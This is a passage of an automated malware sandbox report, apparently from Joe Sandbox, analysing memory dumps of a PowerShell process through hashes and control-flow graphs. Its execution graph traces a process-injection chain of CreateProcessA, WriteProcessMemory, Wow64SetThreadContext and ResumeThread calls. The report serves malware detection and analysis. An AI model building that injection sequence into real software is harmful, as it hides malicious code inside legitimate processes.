                            • Source File: 00000005.00000002.368330186.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_1ed000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7091b6c7dc627c7532807651545ddc262320932380e83d6c89d643067946441
                            • Instruction ID: 811ec3fc626be440368eefcfa6d73feee9399e764e907e8e5956159fd7ada1d1
                            • Opcode Fuzzy Hash: d7091b6c7dc627c7532807651545ddc262320932380e83d6c89d643067946441
                            • Instruction Fuzzy Hash: 4001F731104780AEE7105E16D8C4B6BFB98DF81324F1CC019FC440F282C3799941CAB1
                            Memory Dump Source
                            • Source File: 00000005.00000002.368330186.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_1ed000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d9e3c97cbfc091eaa0ef47b9a0b51592717d78a5ade0610ef816d57d71df8c1
                            • Instruction ID: cafec7c033871f2cf06308df0c1333ac44d95de4f4f564a68cfdc94d2fc418f1
                            • Opcode Fuzzy Hash: 0d9e3c97cbfc091eaa0ef47b9a0b51592717d78a5ade0610ef816d57d71df8c1
                            • Instruction Fuzzy Hash: A0014C7100E7C09FD7128B259C94B56BFB4DF43224F1D81DBE8888F2A3C2695848C772

                            Execution Graph

                            Execution Coverage:11.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:20%
                            Total number of Nodes:25
                            Total number of Limit Nodes:1
                            execution_graph 4277 254b40 4278 254b67 4277->4278 4281 256240 4278->4281 4282 256246 4281->4282 4283 254c72 4282->4283 4288 255a40 WriteProcessMemory 4282->4288 4289 255a48 WriteProcessMemory 4282->4289 4292 255dc4 4282->4292 4296 255dd0 4282->4296 4300 255800 4282->4300 4304 2557f8 4282->4304 4308 255708 4282->4308 4312 255710 4282->4312 4288->4282 4289->4282 4293 255e57 CreateProcessA 4292->4293 4295 2560a5 4293->4295 4295->4295 4297 255e57 CreateProcessA 4296->4297 4299 2560a5 4297->4299 4299->4299 4301 255849 Wow64SetThreadContext 4300->4301 4303 2558c1 4301->4303 4303->4282 4305 255800 Wow64SetThreadContext 4304->4305 4307 2558c1 4305->4307 4307->4282 4309 255710 ResumeThread 4308->4309 4311 2557a0 4309->4311 4311->4282 4313 255754 ResumeThread 4312->4313 4315 2557a0 4313->4315 4315->4282

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 486 256240-256244 487 256246-256281 486->487 488 2562a8-256366 486->488 490 256283 487->490 491 256288-2562a7 487->491 489 256367-25641f 488->489 635 256422 call 255dc4 489->635 636 256422 call 255dd0 489->636 490->491 491->488 496 256424-256444 497 256446-256462 496->497 498 25646d-256496 496->498 497->498 501 25649d-2564e2 498->501 502 256498 498->502 506 2564e4 501->506 507 2564e9-256515 501->507 502->501 506->507 509 256517-256552 507->509 510 25657f-2565b9 507->510 515 256554-256570 509->515 516 25657b-25657d 509->516 513 2565e2-2565ec 510->513 514 2565bb-2565d7 510->514 517 2565f3-256610 513->517 518 2565ee 513->518 514->513 515->516 516->513 521 256617-256653 517->521 522 256612 517->522 518->517 526 256655-256671 521->526 527 25667c-256682 521->527 522->521 526->527 528 2566b4-2566b6 527->528 529 256684-2566b2 527->529 531 2566bc-2566d0 528->531 529->531 533 2566d2-2566ee 531->533 534 2566f9-256703 531->534 533->534 535 256705 534->535 536 25670a-25672e 534->536 535->536 540 256735-256793 536->540 541 256730 536->541 545 256795-2567b1 540->545 546 2567bc-2567d8 540->546 541->540 545->546 625 2567db call 255a40 546->625 626 2567db call 255a48 546->626 548 2567dd-2567fd 549 256826-256830 548->549 550 2567ff-25681b 548->550 552 256837-256844 549->552 553 256832 549->553 550->549 554 256846 552->554 555 25684b-256869 552->555 553->552 554->555 559 256870-25687c 555->559 560 25686b 555->560 561 256a20-256a3c 559->561 560->559 562 256881-25688c 561->562 563 256a42-256a66 561->563 564 256893-2568ba 562->564 565 25688e 562->565 567 256a6d-256a86 563->567 568 256a68 563->568 570 2568c1-2568e8 564->570 571 2568bc 564->571 565->564 629 256a89 call 255a40 567->629 630 256a89 call 255a48 567->630 568->567 578 2568ef-256926 570->578 579 2568ea 570->579 571->570 572 256a8b-256aab 574 256ad4-256ade 572->574 575 256aad-256ac9 572->575 576 256ae5-256b05 574->576 577 256ae0 574->577 575->574 583 256b07 576->583 584 256b0c-256b1c 576->584 577->576 585 2569f1-2569fb 578->585 586 25692c-25697b 578->586 579->578 583->584 588 256b23-256b54 584->588 589 256b1e 584->589 590 256a02-256a13 585->590 591 2569fd 585->591 599 256982-2569a2 586->599 600 25697d 586->600 597 256b56-256b6c 588->597 598 256bbe-256bf8 588->598 589->588 593 256a15 590->593 594 256a1a 590->594 591->590 593->594 594->561 631 256b6f call 255800 597->631 632 256b6f call 2557f8 597->632 606 256c21-256c30 598->606 607 256bfa-256c16 598->607 633 2569a5 call 255a40 599->633 634 2569a5 call 255a48 599->634 600->599 601 256b71-256b91 603 256b93-256baf 601->603 604 256bba-256bbc 601->604 603->604 604->606 605 2569a7-2569c7 608 2569f0 605->608 609 2569c9-2569e5 605->609 627 256c33 call 255710 606->627 628 256c33 call 255708 606->628 607->606 608->585 609->608 611 256c35-256c55 613 256c57-256c73 611->613 614 256c7e-256cce 611->614 613->614 621 256cd5-256ced 614->621 622 256cd0 614->622 621->489 623 256cf3-256cfb 621->623 622->621 625->548 626->548 627->611 628->611 629->572 630->572 631->601 632->601 633->605 634->605 635->496 636->496
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a6d27e3bb49e4cd801fc03dbf3fcc0ccc60ea2b1c322d10875c99bc30210d89
                            • Instruction ID: efd053222b3ac83554dfd5945b3f0329c325668cde45d803f85df84eac842b80
                            • Opcode Fuzzy Hash: 0a6d27e3bb49e4cd801fc03dbf3fcc0ccc60ea2b1c322d10875c99bc30210d89
                            • Instruction Fuzzy Hash: C6521374E102288FDB64DF64C884BEDBBB2BF88301F5485EAD409A7295DB345E89DF40

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 2d1fff-2d2005 1 2d206f-2d2073 0->1 2 2d2007-2d2042 0->2 3 2d2075-2d2086 1->3 4 2d20b3 1->4 5 2d21ec-2d223b 2->5 6 2d2048-2d204d 2->6 3->5 21 2d208c-2d2091 3->21 9 2d20b5-2d20b7 4->9 17 2d243e-2d244d 5->17 18 2d2241-2d2246 5->18 7 2d204f-2d2055 6->7 8 2d2065-2d2069 6->8 10 2d2059-2d2063 7->10 11 2d2057 7->11 8->1 13 2d2194-2d219e 8->13 12 2d20bd-2d20c1 9->12 9->13 10->8 11->8 12->13 16 2d20c7-2d20cb 12->16 19 2d21ac-2d21b2 13->19 20 2d21a0-2d21a9 13->20 16->13 23 2d20d1-2d20f7 16->23 24 2d225e-2d2262 18->24 25 2d2248-2d224e 18->25 26 2d21b8-2d21c4 19->26 27 2d21b4-2d21b6 19->27 28 2d20a9-2d20b1 21->28 29 2d2093-2d2099 21->29 23->13 55 2d20fd-2d2101 23->55 33 2d2268-2d226a 24->33 34 2d23e7-2d23f1 24->34 30 2d2250 25->30 31 2d2252-2d225c 25->31 32 2d21c6-2d21e9 26->32 27->32 28->9 36 2d209d-2d20a7 29->36 37 2d209b 29->37 30->24 31->24 40 2d226c-2d2278 33->40 41 2d227a 33->41 42 2d23fd-2d2403 34->42 43 2d23f3-2d23fa 34->43 36->28 37->28 47 2d227c-2d227e 40->47 41->47 44 2d2409-2d2415 42->44 45 2d2405-2d2407 42->45 51 2d2417-2d243b 44->51 45->51 47->34 50 2d2284-2d22a3 47->50 67 2d22a5-2d22b1 50->67 68 2d22b3 50->68 58 2d2124 55->58 59 2d2103-2d210c 55->59 60 2d2127-2d2134 58->60 61 2d210e-2d2111 59->61 62 2d2113-2d2120 59->62 66 2d213a-2d2191 60->66 65 2d2122 61->65 62->65 65->60 71 2d22b5-2d22b7 67->71 68->71 71->34 72 2d22bd-2d22c1 71->72 72->34 73 2d22c7-2d22cb 72->73 74 2d22cd-2d22dc 73->74 75 2d22de 73->75 76 2d22e0-2d22e2 74->76 75->76 76->34 77 2d22e8-2d22ec 76->77 77->34 78 2d22f2-2d2311 77->78 81 2d2329-2d2334 78->81 82 2d2313-2d2319 78->82 85 2d2336-2d2339 81->85 86 2d2343-2d235f 81->86 83 2d231d-2d231f 82->83 84 2d231b 82->84 83->81 84->81 85->86 87 2d237c-2d2386 86->87 88 2d2361-2d2374 86->88 89 2d2388 87->89 90 2d238a-2d23d8 87->90 88->87 91 2d23dd-2d23e4 89->91 90->91
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: L4#p$L4#p$L4#p$d=(
                            • API String ID: 0-82004000
                            • Opcode ID: e7055504c682598382b629e24b11ed39e01b102391f566aa31ee18fecc9c3f99
                            • Instruction ID: 023666fea52a710026de4ac3e9c08349cedea2b6bb56e3ec84a2f0eb3b362a3a
                            • Opcode Fuzzy Hash: e7055504c682598382b629e24b11ed39e01b102391f566aa31ee18fecc9c3f99
                            • Instruction Fuzzy Hash: 74C13535B20249DFDB159F64C8407AEB7A2AFE4311F14C0ABE9159B391CB70CD69CB61

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 2d0b98-2d0bbb 99 2d0d96-2d0ddb 98->99 100 2d0bc1-2d0bc6 98->100 108 2d0de1-2d0de6 99->108 109 2d0f32-2d0f7e 99->109 101 2d0bde-2d0be2 100->101 102 2d0bc8-2d0bce 100->102 106 2d0be8-2d0bec 101->106 107 2d0d43-2d0d4d 101->107 104 2d0bd0 102->104 105 2d0bd2-2d0bdc 102->105 104->101 105->101 112 2d0bff 106->112 113 2d0bee-2d0bfd 106->113 110 2d0d4f-2d0d58 107->110 111 2d0d5b-2d0d61 107->111 114 2d0dfe-2d0e02 108->114 115 2d0de8-2d0dee 108->115 127 2d10eb-2d111d 109->127 128 2d0f84-2d0f89 109->128 117 2d0d67-2d0d73 111->117 118 2d0d63-2d0d65 111->118 119 2d0c01-2d0c03 112->119 113->119 124 2d0edf-2d0ee9 114->124 125 2d0e08-2d0e0a 114->125 121 2d0df0 115->121 122 2d0df2-2d0dfc 115->122 123 2d0d75-2d0d93 117->123 118->123 119->107 126 2d0c09-2d0c29 119->126 121->114 122->114 129 2d0eeb-2d0ef4 124->129 130 2d0ef7-2d0efd 124->130 132 2d0e0c-2d0e18 125->132 133 2d0e1a 125->133 161 2d0c48 126->161 162 2d0c2b-2d0c46 126->162 159 2d112d 127->159 160 2d111f-2d112b 127->160 135 2d0f8b-2d0f91 128->135 136 2d0fa1-2d0fa5 128->136 137 2d0eff-2d0f01 130->137 138 2d0f03-2d0f0f 130->138 140 2d0e1c-2d0e1e 132->140 133->140 144 2d0f95-2d0f9f 135->144 145 2d0f93 135->145 147 2d0fab-2d0fad 136->147 148 2d109a-2d10a4 136->148 146 2d0f11-2d0f2f 137->146 138->146 140->124 142 2d0e24-2d0e28 140->142 149 2d0e48 142->149 150 2d0e2a-2d0e46 142->150 144->136 145->136 157 2d0fbd 147->157 158 2d0faf-2d0fbb 147->158 154 2d10a6-2d10af 148->154 155 2d10b2-2d10b8 148->155 165 2d0e4a-2d0e4c 149->165 150->165 163 2d10be-2d10ca 155->163 164 2d10ba-2d10bc 155->164 167 2d0fbf-2d0fc1 157->167 158->167 170 2d112f-2d1131 159->170 160->170 173 2d0c4a-2d0c4c 161->173 162->173 171 2d10cc-2d10e8 163->171 164->171 165->124 172 2d0e52-2d0e65 165->172 167->148 174 2d0fc7-2d0fc9 167->174 181 2d117d-2d1187 170->181 182 2d1133-2d1139 170->182 202 2d0e6b-2d0e6d 172->202 173->107 177 2d0c52-2d0c54 173->177 178 2d0fd9 174->178 179 2d0fcb-2d0fd7 174->179 190 2d0c64 177->190 191 2d0c56-2d0c62 177->191 183 2d0fdb-2d0fdd 178->183 179->183 187 2d1189-2d118f 181->187 188 2d1192-2d1198 181->188 184 2d113b-2d113d 182->184 185 2d1147-2d1164 182->185 183->148 193 2d0fe3-2d0fe5 183->193 184->185 207 2d11ca-2d11cf 185->207 208 2d1166-2d1177 185->208 195 2d119e-2d11aa 188->195 196 2d119a-2d119c 188->196 197 2d0c66-2d0c68 190->197 191->197 198 2d0fff-2d1003 193->198 199 2d0fe7-2d0fed 193->199 201 2d11ac-2d11c7 195->201 196->201 197->107 203 2d0c6e-2d0c8e 197->203 209 2d101d-2d1097 198->209 210 2d1005-2d100b 198->210 205 2d0fef 199->205 206 2d0ff1-2d0ffd 199->206 211 2d0e6f-2d0e75 202->211 212 2d0e85-2d0edc 202->212 228 2d0ca6-2d0caa 203->228 229 2d0c90-2d0c96 203->229 205->198 206->198 207->208 208->181 217 2d100d 210->217 218 2d100f-2d101b 210->218 219 2d0e79-2d0e7b 211->219 220 2d0e77 211->220 217->209 218->209 219->212 220->212 233 2d0cac-2d0cb2 228->233 234 2d0cc4-2d0cc8 228->234 231 2d0c98 229->231 232 2d0c9a-2d0c9c 229->232 231->228 232->228 235 2d0cb4 233->235 236 2d0cb6-2d0cc2 233->236 237 2d0ccf-2d0cd1 234->237 235->234 236->234 238 2d0ce9-2d0d40 237->238 239 2d0cd3-2d0cd9 237->239 241 2d0cdd-2d0cdf 239->241 242 2d0cdb 239->242 241->238 242->238
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: X2$X2$l;($l;(
                            • API String ID: 0-1947097442
                            • Opcode ID: 7cfe76f6d8fcb3278ab7ac700a93f5fe8535fff0a3984c7c240d06a44f345ed5
                            • Instruction ID: 372dbe775fa05357b5c569468f53ea818c506e87834016757199528ec9494806
                            • Opcode Fuzzy Hash: 7cfe76f6d8fcb3278ab7ac700a93f5fe8535fff0a3984c7c240d06a44f345ed5
                            • Instruction Fuzzy Hash: 32F14731B242069FDB249F7988807BABBA2EFD0310F24846BD455CB3A1DB71CD61C762

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 244 255dc4-255e69 246 255eb2-255eda 244->246 247 255e6b-255e82 244->247 250 255f20-255f76 246->250 251 255edc-255ef0 246->251 247->246 252 255e84-255e89 247->252 261 255fbc-2560a3 CreateProcessA 250->261 262 255f78-255f8c 250->262 251->250 259 255ef2-255ef7 251->259 253 255eac-255eaf 252->253 254 255e8b-255e95 252->254 253->246 256 255e97 254->256 257 255e99-255ea8 254->257 256->257 257->257 260 255eaa 257->260 263 255ef9-255f03 259->263 264 255f1a-255f1d 259->264 260->253 280 2560a5-2560ab 261->280 281 2560ac-25618a 261->281 262->261 269 255f8e-255f93 262->269 266 255f05 263->266 267 255f07-255f16 263->267 264->250 266->267 267->267 270 255f18 267->270 271 255f95-255f9f 269->271 272 255fb6-255fb9 269->272 270->264 274 255fa1 271->274 275 255fa3-255fb2 271->275 272->261 274->275 275->275 276 255fb4 275->276 276->272 280->281 293 25618c-256190 281->293 294 25619a-25619e 281->294 293->294 295 256192 293->295 296 2561a0-2561a4 294->296 297 2561ae-2561b2 294->297 295->294 296->297 300 2561a6 296->300 298 2561b4-2561b8 297->298 299 2561c2-2561c6 297->299 298->299 301 2561ba 298->301 302 2561fc-256207 299->302 303 2561c8-2561f1 299->303 300->297 301->299 307 256208 302->307 303->302 307->307
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00256090
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 271fd37af6c4f2e04c4747b32e1fb4c81498eac900c3c0f84764957530c636c8
                            • Instruction ID: 644358a3ce5285ab923158543fee3b696531deedabee2cb17fe8f2a5a05259d8
                            • Opcode Fuzzy Hash: 271fd37af6c4f2e04c4747b32e1fb4c81498eac900c3c0f84764957530c636c8
                            • Instruction Fuzzy Hash: D3C14A70D1062A8FEF10DFA4C845BEDBBB1BF45304F0091A9E819B7290DB749A99CF95

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 308 255dd0-255e69 310 255eb2-255eda 308->310 311 255e6b-255e82 308->311 314 255f20-255f76 310->314 315 255edc-255ef0 310->315 311->310 316 255e84-255e89 311->316 325 255fbc-2560a3 CreateProcessA 314->325 326 255f78-255f8c 314->326 315->314 323 255ef2-255ef7 315->323 317 255eac-255eaf 316->317 318 255e8b-255e95 316->318 317->310 320 255e97 318->320 321 255e99-255ea8 318->321 320->321 321->321 324 255eaa 321->324 327 255ef9-255f03 323->327 328 255f1a-255f1d 323->328 324->317 344 2560a5-2560ab 325->344 345 2560ac-25618a 325->345 326->325 333 255f8e-255f93 326->333 330 255f05 327->330 331 255f07-255f16 327->331 328->314 330->331 331->331 334 255f18 331->334 335 255f95-255f9f 333->335 336 255fb6-255fb9 333->336 334->328 338 255fa1 335->338 339 255fa3-255fb2 335->339 336->325 338->339 339->339 340 255fb4 339->340 340->336 344->345 357 25618c-256190 345->357 358 25619a-25619e 345->358 357->358 359 256192 357->359 360 2561a0-2561a4 358->360 361 2561ae-2561b2 358->361 359->358 360->361 364 2561a6 360->364 362 2561b4-2561b8 361->362 363 2561c2-2561c6 361->363 362->363 365 2561ba 362->365 366 2561fc-256207 363->366 367 2561c8-2561f1 363->367 364->361 365->363 371 256208 366->371 367->366 371->371
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00256090
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: e50af7600a34f32af19cfd24fdcdabb4e2f0a03cc2e426f2304d7cd1f4fc3766
                            • Instruction ID: 158c08e5a5ed0e17052751445fdf6f358325d6c75048882203f043506dedc0c6
                            • Opcode Fuzzy Hash: e50af7600a34f32af19cfd24fdcdabb4e2f0a03cc2e426f2304d7cd1f4fc3766
                            • Instruction Fuzzy Hash: 1EC14970D1062A8FDF14DFA4C845BEEBBB1BF45304F0091A9E819B7280DB749A99CF95

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 372 255a40-255ab3 374 255ab5-255ac7 372->374 375 255aca-255b2b WriteProcessMemory 372->375 374->375 377 255b34-255b86 375->377 378 255b2d-255b33 375->378 378->377
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00255B1B
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 7e757926182a647dbb7866d5123d7ff90b4bb72d7e2da885dbf83ad28fe8b5ea
                            • Instruction ID: 99cad51fecae59a81c39fb0f3025b710ddc4900849b86508aa3b26f6e7aa20cc
                            • Opcode Fuzzy Hash: 7e757926182a647dbb7866d5123d7ff90b4bb72d7e2da885dbf83ad28fe8b5ea
                            • Instruction Fuzzy Hash: C541B9B4D112588FCF00CFA9D984AEEBBF1BF49314F20902AE814BB250C374AA55CF58

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 383 255a48-255ab3 385 255ab5-255ac7 383->385 386 255aca-255b2b WriteProcessMemory 383->386 385->386 388 255b34-255b86 386->388 389 255b2d-255b33 386->389 389->388
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00255B1B
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: ef96a8eea6153bfb29779fe9f1f72277a9e58aed105c87f4aae6703fd2572a75
                            • Instruction ID: ddb98ee765f0925c3cd268975171e33e329e35e95219dd15fac1b4891c3161db
                            • Opcode Fuzzy Hash: ef96a8eea6153bfb29779fe9f1f72277a9e58aed105c87f4aae6703fd2572a75
                            • Instruction Fuzzy Hash: 3A41BBB4D102189FCF00CFA9D984AEEFBF1BB49314F20902AE814B7250D334AA55CF54

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 394 2557f8-255860 397 255877-2558bf Wow64SetThreadContext 394->397 398 255862-255874 394->398 400 2558c1-2558c7 397->400 401 2558c8-255914 397->401 398->397 400->401
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 002558AF
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: ed49b0b57765cf3bb3ce9bd109a660857da703c2e9b63cf581320f41160149f3
                            • Instruction ID: bdd54ee9fbbc888ac9c3584fd2853d5c3e89157512427c72349e85b279349646
                            • Opcode Fuzzy Hash: ed49b0b57765cf3bb3ce9bd109a660857da703c2e9b63cf581320f41160149f3
                            • Instruction Fuzzy Hash: 7141DEB4D112589FDB10DFA9D884AEEFBF1BF49314F24842AE814B7240D738AA49CF54

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 406 255800-255860 408 255877-2558bf Wow64SetThreadContext 406->408 409 255862-255874 406->409 411 2558c1-2558c7 408->411 412 2558c8-255914 408->412 409->408 411->412
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 002558AF
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 177ff8f4256b6296f077e71b5f14624247b4ddd52dfeb202f1305ade46d7a02f
                            • Instruction ID: 141a6e4e7eff8e5389c9413f10f90d8826988a553ddd2228fdd1d9f3b8b68f2f
                            • Opcode Fuzzy Hash: 177ff8f4256b6296f077e71b5f14624247b4ddd52dfeb202f1305ade46d7a02f
                            • Instruction Fuzzy Hash: 5931CEB4D102589FDB10DFA9D884AEEFBF1BF48314F24802AE814B7240D778AA49CF54

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 417 255708-25579e ResumeThread 421 2557a7-2557e9 417->421 422 2557a0-2557a6 417->422 422->421
                            APIs
                            • ResumeThread.KERNELBASE(?), ref: 0025578E
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 4894c219860e08de4c88422c1bdd604abd628e9c5008271a7a05503624ea1e80
                            • Instruction ID: 3eb1501a64a997e7367773a342908881bf831713f031a1fd8cb955cf2401f853
                            • Opcode Fuzzy Hash: 4894c219860e08de4c88422c1bdd604abd628e9c5008271a7a05503624ea1e80
                            • Instruction Fuzzy Hash: 2731EDB4D102189FCB10DFA9D884AEEFBF5AF89310F20842AE814B7300C735A904CF58

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 427 255710-25579e ResumeThread 430 2557a7-2557e9 427->430 431 2557a0-2557a6 427->431 431->430
                            APIs
                            • ResumeThread.KERNELBASE(?), ref: 0025578E
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 14ef39367eda3ca2b6cf291ef0059dd140a5e6fd29c9b23a04bc4d8d0e7f063f
                            • Instruction ID: fe9a9757994b9fb9ea180915d0efe9a647f117ddc0f448409e999b0aa9ed0724
                            • Opcode Fuzzy Hash: 14ef39367eda3ca2b6cf291ef0059dd140a5e6fd29c9b23a04bc4d8d0e7f063f
                            • Instruction Fuzzy Hash: 2D31ACB4D102189FCB14DFA9D984AEEFBB5AF89314F20942AE814B7340C774A905CF59

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 688 2d1730-2d1733 689 2d1739-2d1741 688->689 690 2d1735-2d1737 688->690 691 2d1759-2d175a 689->691 692 2d1743-2d1749 689->692 690->689 693 2d175c-2d175d 691->693 694 2d1770-2d1773 691->694 695 2d174d-2d1757 692->695 696 2d174b 692->696 697 2d188e-2d1898 693->697 698 2d175e-2d1765 693->698 699 2d1777-2d1779 694->699 695->691 696->691 703 2d189a-2d18a3 697->703 704 2d18a6-2d18ac 697->704 701 2d1775 698->701 702 2d1767-2d176d 698->702 699->697 705 2d177f-2d1783 699->705 701->699 702->694 706 2d18ae-2d18b0 704->706 707 2d18b2-2d18be 704->707 708 2d1785-2d1794 705->708 709 2d1796 705->709 711 2d18c0-2d18df 706->711 707->711 712 2d1798-2d179a 708->712 709->712 712->697 714 2d17a0-2d17a2 712->714 715 2d17a4-2d17b0 714->715 716 2d17b2 714->716 718 2d17b4-2d17b6 715->718 716->718 718->697 719 2d17bc-2d17be 718->719 721 2d17d8-2d17e3 719->721 722 2d17c0-2d17c6 719->722 725 2d17e5-2d17e8 721->725 726 2d17f2-2d17fe 721->726 723 2d17c8 722->723 724 2d17ca-2d17d6 722->724 723->721 724->721 725->726 727 2d180c-2d1813 726->727 728 2d1800-2d1802 726->728 730 2d181a-2d181c 727->730 728->727 731 2d181e-2d1824 730->731 732 2d1834-2d188b 730->732 733 2d1828-2d182a 731->733 734 2d1826 731->734 733->732 734->732
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f146a270fa5454eeda48bfc49868db951b7da25aaedadc6149b3e4f9a51bdca6
                            • Instruction ID: f8eb7fe8ad48fff102431eb08cf1fc7a123ce05b234117d8a702d11063740fab
                            • Opcode Fuzzy Hash: f146a270fa5454eeda48bfc49868db951b7da25aaedadc6149b3e4f9a51bdca6
                            • Instruction Fuzzy Hash: 20414935724242EBEB298E6494401BAF3A1AF91310B3885ABD861CB7A1D7B0CD75D712
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5d94ccc218859cb6c318f1d44196969da7f93e5cabd74064f82fe23815afec1e
                            • Instruction ID: 1f3cc56f27397c9a5254c44474fe0725c7172c92e61e48fded4688c727a517b0
                            • Opcode Fuzzy Hash: 5d94ccc218859cb6c318f1d44196969da7f93e5cabd74064f82fe23815afec1e
                            • Instruction Fuzzy Hash: B111343AB60206AFDF245A64D4112FDF351ABD4324B20C56BC9A58BB90EB31CD72C792
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: af2a0242d3e0a6f219e43db0cb32848e35d5053cbb5f0a7958d735dc86fe77fd
                            • Instruction ID: 494a84d87c84994201efc8912227bc00e4150b3c607ebf25459ca75dc0a8bc36
                            • Opcode Fuzzy Hash: af2a0242d3e0a6f219e43db0cb32848e35d5053cbb5f0a7958d735dc86fe77fd
